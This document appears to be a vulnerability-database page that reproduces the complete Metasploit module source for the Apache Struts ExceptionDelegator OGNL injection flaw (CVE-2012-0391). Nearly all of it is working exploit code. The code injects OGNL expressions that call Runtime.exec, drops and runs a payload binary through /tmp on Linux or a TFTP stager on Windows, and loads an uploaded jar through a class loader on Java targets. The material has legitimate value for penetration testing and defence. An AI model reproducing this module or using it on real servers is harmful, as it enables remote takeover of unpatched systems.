Apache Struts Remote Command Execution

2012-06-03T20:08:31
ID MSF:EXPLOIT/MULTI/HTTP/STRUTS_CODE_EXEC_EXCEPTION_DELEGATOR
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.1.1. This issue is caused because the ExceptionDelegator interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Apache Struts Remote Command Execution',
      'Description'    =&gt; %q{
          This module exploits a remote command execution vulnerability in
        Apache Struts versions &lt; 2.2.1.1. This issue is caused because the
        ExceptionDelegator interprets parameter values as OGNL expressions
        during certain exception handling for mismatched data types of properties,
        which allows remote attackers to execute arbitrary Java code via a
        crafted parameter.
      },
      'Author'         =&gt;
        [
          'Johannes Dahse', # Vulnerability discovery and PoC
          'Andreas Nusser', # Vulnerability discovery and PoC
          'juan vazquez', # Metasploit module
          'sinn3r', # Metasploit module
          'mihi' # ARCH_JAVA support
        ],
      'License'        =&gt; MSF_LICENSE,
      'References'     =&gt;
        [
          [ 'CVE', '2012-0391'],
          [ 'OSVDB', '78277'],
          [ 'EDB', '18329']
        ],
      'Platform'      =&gt; %w{ java linux win },
      'Privileged'     =&gt; true,
      'Targets'        =&gt;
        [
          ['Windows Universal',
            {
                'Arch' =&gt; ARCH_X86,
                'Platform' =&gt; 'win',
                'CmdStagerFlavor' =&gt; 'tftp'
            }
          ],
          ['Linux Universal',
            {
                'Arch' =&gt; ARCH_X86,
                'Platform' =&gt; 'linux'
            }
          ],
          [ 'Java Universal',
            {
                'Arch' =&gt; ARCH_JAVA,
                'Platform' =&gt; 'java'
            },
          ]
        ],
      'DisclosureDate' =&gt; 'Jan 06 2012',
      'DefaultTarget' =&gt; 2))

      register_options(
        [
          Opt::RPORT(8080),
          OptString.new('TARGETURI', [ true, 'The path to a struts application action and the parameter to inject ie. /HelloWorldStruts2/hello?name=test&id=INJECT', ""]),
          OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
        ])
  end

  def execute_command(cmd, opts = {})

    uri = String.new(datastore['TARGETURI'])
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\"))%2b'") if target['Platform'] == 'win'
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec(\"CMD\".split(\"@\")))%2b'") if target['Platform'] == 'linux'
    uri.gsub!(/INJECT/, "'%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,CMD,'')%2b'") if target['Platform'] == 'java'
    uri.gsub!(/CMD/, Rex::Text::uri_encode(cmd))

    vprint_status("Attempting to execute: #{cmd}")

    resp = send_request_raw({
      'uri'     =&gt; uri,
      'version' =&gt; '1.1',
      'method'  =&gt; 'GET',
    }, 5)

  end

  def windows_stager
    exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"

    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    execute_cmdstager({ :temp =&gt; '.' })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  def linux_stager
    cmds = "/bin/sh@-c@echo LINE | tee FILE"
    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(4+rand(4))

    execute_command("/bin/sh@-c@touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end

    execute_command("/bin/sh@-c@base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("/bin/sh@-c@chmod +x /tmp/#{file}")
    execute_command("/bin/sh@-c@rm /tmp/#{file}.b64")

    execute_command("/bin/sh@-c@/tmp/#{file}")
    @payload_exe = "/tmp/" + file
  end

  def java_upload_part(part, filename, append = 'false')
    cmd = ""
    cmd &lt;&lt; "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
    cmd &lt;&lt; "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
    cmd &lt;&lt; "#f.close()"
    execute_command(cmd)
  end

  def java_stager
    @payload_exe = rand_text_alphanumeric(4+rand(4)) + ".jar"
    append = 'false'
    jar = payload.encoded_jar.pack

    chunk_length = 384 # 512 bytes when base64 encoded

    while(jar.length &gt; chunk_length)
      java_upload_part(jar[0, chunk_length], @payload_exe, append)
      jar = jar[chunk_length, jar.length - chunk_length]
      append='true'
    end
    java_upload_part(jar, @payload_exe, append)

    cmd = ""
    # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1
    cmd &lt;&lt; "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
    cmd &lt;&lt; "#q.setAccessible(true),#q.set(null,true),"
    cmd &lt;&lt; "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
    cmd &lt;&lt; "#q.setAccessible(true),#q.set(null,false),"
    # create classloader
    cmd &lt;&lt; "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
    # load class
    cmd &lt;&lt; "#c=#cl.loadClass('metasploit.Payload'),"
    # invoke main method
    cmd &lt;&lt; "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
    cmd &lt;&lt; "null,new java.lang.Object[]{new java.lang.String[0]})"
    execute_command(cmd)
  end

  def on_new_session(client)

    if client.type != "meterpreter"
      print_error("Please use a meterpreter payload in order to automatically cleanup.")
      print_error("The #{@payload_exe} file must be removed manually.")
      return
    end

    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

    if client.sys.config.sysinfo["OS"] =~ /Windows/
      print_error("Windows does not allow running executables to be deleted")
      print_error("The #{@payload_exe} file must be removed manually after migrating")
      return
    end

    print_warning("Deleting the #{@payload_exe} file")
    client.fs.file.rm(@payload_exe)

  end

  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing user supplied command")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
      when 'linux'
        linux_stager
      when 'win'
        windows_stager
      when 'java'
        java_stager
      else
        fail_with(Failure::NoTarget, 'Unsupported target platform!')
    end

    handler
  end
end